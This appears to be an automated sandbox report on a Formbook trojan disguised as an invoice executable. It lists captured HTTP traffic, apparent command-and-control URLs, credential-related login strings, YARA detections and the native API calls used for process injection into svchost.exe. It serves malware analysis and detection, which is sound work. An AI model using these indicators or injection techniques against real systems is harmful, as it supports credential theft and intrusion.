            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 10:36:15 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 10:36:18 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Mon, 07 Oct 2024 10:36:24 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Mon, 07 Oct 2024 10:36:26 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Mon, 07 Oct 2024 10:36:29 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            date: Mon, 07 Oct 2024 10:36:31 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:36:37 GMT
            Server: Apache/2.4.6 (CentOS) PHP/7.2.34
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:36:40 GMT
            Server: Apache/2.4.6 (CentOS) PHP/7.2.34
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:36:42 GMT
            Server: Apache/2.4.6 (CentOS) PHP/7.2.34
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.00000000054B6000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.00000000040A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000678E000.00000004.80000000.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000596C000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000537E000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000455C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2200567149.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, dpqsbGoWdXlp.exe, 0000000C.00000002.2342313446.0000000002A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.drString found in binary or memory: http://tempuri.org/kursovaSQLDataSet.xsd
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4587208123.0000000007422000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4587208123.0000000007422000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net/x0tl/
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: svchost.exe, 0000000F.00000003.2474247206.0000000007E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: svchost.exe, 0000000F.00000002.4576101879.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: svchost.exe, 0000000F.00000002.4575924978.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: svchost.exe, 0000000F.00000002.4576101879.0000000002E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: z1SupplyInvoiceCM60916_Doc.exe
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0042C633 NtClose,11_2_0042C633
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742B60 NtClose,LdrInitializeThunk,11_2_01742B60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01742DF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01742C70
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017435C0 NtCreateMutant,LdrInitializeThunk,11_2_017435C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01744340 NtSetContextThread,11_2_01744340
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01744650 NtSuspendThread,11_2_01744650
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BF0 NtAllocateVirtualMemory,11_2_01742BF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BE0 NtQueryValueKey,11_2_01742BE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742BA0 NtEnumerateValueKey,11_2_01742BA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742B80 NtQueryInformationFile,11_2_01742B80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AF0 NtWriteFile,11_2_01742AF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AD0 NtReadFile,11_2_01742AD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742AB0 NtWaitForSingleObject,11_2_01742AB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D30 NtUnmapViewOfSection,11_2_01742D30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D10 NtMapViewOfSection,11_2_01742D10
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742D00 NtSetInformationFile,11_2_01742D00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DD0 NtDelayExecution,11_2_01742DD0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742DB0 NtEnumerateKey,11_2_01742DB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C60 NtCreateKey,11_2_01742C60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742C00 NtQueryInformationProcess,11_2_01742C00
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CF0 NtOpenProcess,11_2_01742CF0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CC0 NtQueryVirtualMemory,11_2_01742CC0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742CA0 NtQueryInformationToken,11_2_01742CA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F60 NtCreateProcessEx,11_2_01742F60
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F30 NtCreateSection,11_2_01742F30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FE0 NtCreateFile,11_2_01742FE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FB0 NtResumeThread,11_2_01742FB0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742FA0 NtQuerySection,11_2_01742FA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742F90 NtProtectVirtualMemory,11_2_01742F90
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742E30 NtWriteVirtualMemory,11_2_01742E30
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742EE0 NtQueueApcThread,11_2_01742EE0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742EA0 NtAdjustPrivilegesToken,11_2_01742EA0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742E80 NtReadVirtualMemory,11_2_01742E80
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743010 NtOpenDirectoryObject,11_2_01743010
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743090 NtSetValueKey,11_2_01743090
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017439B0 NtGetContextThread,11_2_017439B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743D70 NtOpenThread,11_2_01743D70
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01743D10 NtOpenProcessToken,11_2_01743D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03574340 NtSetContextThread,LdrInitializeThunk,15_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03574650 NtSuspendThread,LdrInitializeThunk,15_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572B60 NtClose,LdrInitializeThunk,15_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BE0 NtQueryValueKey,LdrInitializeThunk,15_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AD0 NtReadFile,LdrInitializeThunk,15_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AF0 NtWriteFile,LdrInitializeThunk,15_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F30 NtCreateSection,LdrInitializeThunk,15_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FE0 NtCreateFile,LdrInitializeThunk,15_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FB0 NtResumeThread,LdrInitializeThunk,15_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572EE0 NtQueueApcThread,LdrInitializeThunk,15_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D10 NtMapViewOfSection,LdrInitializeThunk,15_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DD0 NtDelayExecution,LdrInitializeThunk,15_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C60 NtCreateKey,LdrInitializeThunk,15_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035735C0 NtCreateMutant,LdrInitializeThunk,15_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035739B0 NtGetContextThread,LdrInitializeThunk,15_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572B80 NtQueryInformationFile,15_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572AB0 NtWaitForSingleObject,15_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F60 NtCreateProcessEx,15_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572F90 NtProtectVirtualMemory,15_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572FA0 NtQuerySection,15_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572E30 NtWriteVirtualMemory,15_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572EA0 NtAdjustPrivilegesToken,15_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572D00 NtSetInformationFile,15_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572DB0 NtEnumerateKey,15_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572C00 NtQueryInformationProcess,15_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CC0 NtQueryVirtualMemory,15_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03572CF0 NtOpenProcess,15_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573010 NtOpenDirectoryObject,15_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573090 NtSetValueKey,15_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573D70 NtOpenThread,15_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03573D10 NtOpenProcessToken,15_2_03573D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D8E50 NtCreateFile,15_2_007D8E50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D8FC0 NtReadFile,15_2_007D8FC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D90B0 NtDeleteFile,15_2_007D90B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D9150 NtClose,15_2_007D9150
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D92B0 NtAllocateVirtualMemory,15_2_007D92B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360059115_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F244615_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E442015_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EE4F615_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FAB4015_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F6BD715_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353EA8015_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355696215_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360A9A615_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035429A015_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354A84015_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354284015_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0356E8F015_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035268B815_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B4F4015_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03560F3015_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E2F3015_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03582F2815_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03532FC815_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354CFE015_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035BEFA015_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03540E5915_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FEE2615_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FEEDB15_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03552E9015_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FCE9315_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DCD1F15_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354AD0015_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353ADE015_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03558DBF15_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03540C0015_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03530CF215_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E0CB515_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0352D34C15_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F132D15_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0358739A15_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355B2C015_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E12ED15_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035452A015_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360B16B15_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0352F17215_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0357516C15_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354B1B015_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EF0CC15_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035470C015_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F70E915_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF0E015_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF7B015_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0358563015_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F16CC15_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F757115_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_036095C315_2_036095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DD5B015_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353146015_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF43F15_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFB7615_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B5BF015_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0357DBF915_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355FB8015_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFA4915_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F7A4615_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B3A6C15_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EDAC615_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DDAAC15_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03585AA015_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E1AA315_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354995015_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355B95015_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035D591015_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035AD80015_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035438E015_2_035438E0
